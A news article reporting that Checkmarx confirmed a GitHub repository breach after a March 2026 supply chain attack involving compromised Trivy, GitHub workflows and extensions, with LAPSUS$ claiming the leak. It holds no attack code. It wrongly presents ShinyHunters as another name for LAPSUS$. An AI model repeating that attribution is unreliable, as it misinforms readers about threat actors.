-
Checkmarx discovered unauthorized actors accessed its GitHub repository during a March 2026 supply chain attack.
-
The hacking group LAPSUS$ claims it stole source code, employee databases, API keys, and database credentials from the security firm.
-
Researchers trace the initial breach to compromised Trivy scanner and GitHub workflows that distributed credential-stealing malware.
Israeli application security firm Checkmarx faces a major security crisis. The company just confirmed that hackers leaked data from its internal systems on the dark web. This follows a sophisticated supply chain cyberattack that investigators first detected on March 23, 2026.
Checkmarx specializes in helping other companies secure their code. Now it’s dealing with its own breach. The irony isn’t lost on cybersecurity experts watching this unfold.
Hackers Breached GitHub Repository
Checkmarx released a public statement explaining what happened. Forensic investigators found that attackers gained unauthorized access to one of the company’s GitHub repositories. The leaked data came directly from this compromised repository.
The firm stressed an important point. This repository operates separately from its production environment. Checkmarx stores no customer data there. However, investigators still haven’t determined exactly what sensitive information the hackers exposed.
“We have restricted access to the impacted repository and are continuing a comprehensive forensic analysis as part of our response,” the company stated. Checkmarx promised to notify customers immediately if investigators confirm any customer-related information was exposed.
The situation got worse after Dark Web Informer, a cybercrime intelligence account, shared concerning news. The notorious hacking collective LAPSUS$ listed Checkmarx as a victim on its data leak site.
LAPSUS$ claims the stolen dataset includes source code repositories, internal employee database records, API keys, authentication tokens, and database credentials.
This focus on stealing source code reflects a larger trend. In a separate high-profile incident, hackers sold alleged Target source code on the dark web, and employees later confirmed its authenticity, showing that cybercriminals are increasingly targeting source code as a valuable commodity for sale, extortion, or competitive intelligence.
Checkmarx hasn’t fully verified these claims yet. But if authentic, this information could enable unauthorized system access, intellectual property theft, and downstream attacks on other organizations.
Attackers Exploited Development Tools
This breach fits a dangerous pattern. Security researchers classify it as a supply chain compromise. Attackers exploited vulnerabilities in third-party tools and development pipelines that Checkmarx uses.
Investigators linked the initial intrusion to Trivy, an open-source vulnerability scanner. Hackers compromised Trivy, which allowed them to manipulate the development workflows of Checkmarx. The attackers modified two GitHub Actions workflows and plugins distributed through the Open VSX marketplace. They injected credential-stealing malware into these components.
This malicious code harvested sensitive developer secrets. It captured access tokens, encryption keys, and environment variables. Modern software development environments consider these assets extremely valuable.
Researchers recently identified additional compromises. Attackers also weaponized Checkmarx’s KICS Docker image, Visual Studio Code extensions, and GitHub workflows. They used these components to disperse similar credential-harvesting malware.
The breach created ripple effects beyond Checkmarx itself. Hackers temporarily compromised the CLI package for Bitwarden, a widely used password management tool. Bitwarden quickly contained the issue, but it highlighted the cascading risks in interconnected software supply chains.
LAPSUS$ Making Waves in the Cyber Crime Space
Security experts attribute the initial attack to a threat group called TeamPCP. However, LAPSUS$ claimed responsibility for the subsequent data leak. LAPSUS$ operates as a financially inspired internet crime group with a timeline of high-profile breaches.
LAPSUS$, also known as Strawberry Tempest or ShinyHunters, has been active since 2021. The group attacked major tech firms, including Microsoft, Nvidia, Samsung, Ubisoft, Okta, and Rockstar Games. Teenagers based in the UK and Brazil primarily compose the group. They use social engineering, SIM swapping, and MFA fatigue to gain access.
The group focuses on data theft and extortion rather than traditional ransomware. They steal sensitive data and threaten to leak it publicly. LAPSUS$ members use phone-based social engineering, pay insiders for credentials, and compromise personal email accounts of employees.
Authorities arrested several members in 2022, including a prominent teenage member from Oxford, UK. Courts gave him an indefinite hospital order in 2023.
The Checkmarx incident highlights a critical vulnerability. Modern software development relies heavily on third-party tools and automated pipelines. Supply chain events exploit trust relationships. When bad actors hit a legit component, they can potentially reach millions of downstream users.
This case follows similar high-profile incidents in recent years. Security experts continue calling for stricter security controls, improved code-signing practices, and enhanced monitoring of development environments.
Checkmarx emphasized that its investigation remains active. The company works with cybersecurity experts to assess the full scope of the breach. It has deployed containment practices, such as revoking details and gathering affected assets.
Three key questions remain unanswered: What exact data did hackers steal? Are customer environments truly unaffected? Could additional organizations face indirect impacts?
The incident reminds us that cyber threats continue evolving in sophistication. Organizations must secure every layer of the software supply chain.
